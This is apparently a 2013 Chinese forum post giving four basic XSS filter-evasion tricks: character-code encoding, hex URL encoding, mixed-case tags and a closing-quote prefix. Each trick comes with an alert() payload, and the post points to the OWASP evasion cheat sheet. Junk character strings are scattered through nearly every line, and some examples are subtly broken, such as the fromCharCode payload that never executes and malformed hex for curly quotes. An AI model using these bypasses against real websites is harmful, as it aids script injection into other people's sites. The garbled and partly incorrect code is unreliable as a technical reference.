四种超级基础的绕过方法。1 D; H7 k$ Y* F6 r- W
1.转换为ASCII码
6 A, }; H* z2 A; F! a# N) B3 `例子:原脚本为<script>alert(‘I love F4ck’)</script >
/ \9 P* W' x! i& ~3 a# m通过转换,变成:6 N) v7 D9 i! c8 \
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>( _; M- `6 C* Q, j8 j
% h8 Z( ?: z" x) M1 _" J
2.转换为HEX(十六进制)
2 G; l# U# T' ~9 q @7 ` C例子:原脚本为<script>alert(‘I love F4ck’)</script>7 I. c: Q" ~3 E4 g
通过转换,变成:" c0 q# k% ?9 G+ c y0 P
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
) \- f0 P( {" W, V o
* r$ Q% ?7 g+ t0 q. z) _4 |3.转换脚本的大小写
: s! z+ n( z" F5 @1 f4 G9 d! r8 ]; L例子:原脚本为<script>alert(‘I love F4ck’)</script>. q4 V& v2 s; M3 i1 g/ u+ T, u
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
& J! j- h' t' \, }* o& X4 K ; I. t' z0 S3 e2 q- H( |1 {
4.增加闭合标记”># ]" @& v; F( C/ K
例子:原脚本为<script>alert(‘I love F4ck’)</script>) Y2 S! g' Z W/ j5 }- y4 j
转换为:”><script>alert(‘I love F4ck’)</script>
2 V' P$ q/ G: }! @0 Q更详细绕过技术请参考此网页
: H/ J4 Y( _8 Y# R' i% q7 Ahttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
+ l8 }! z3 f1 d i% V; g, v8 V * p" d2 a' x: |/ E5 U
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对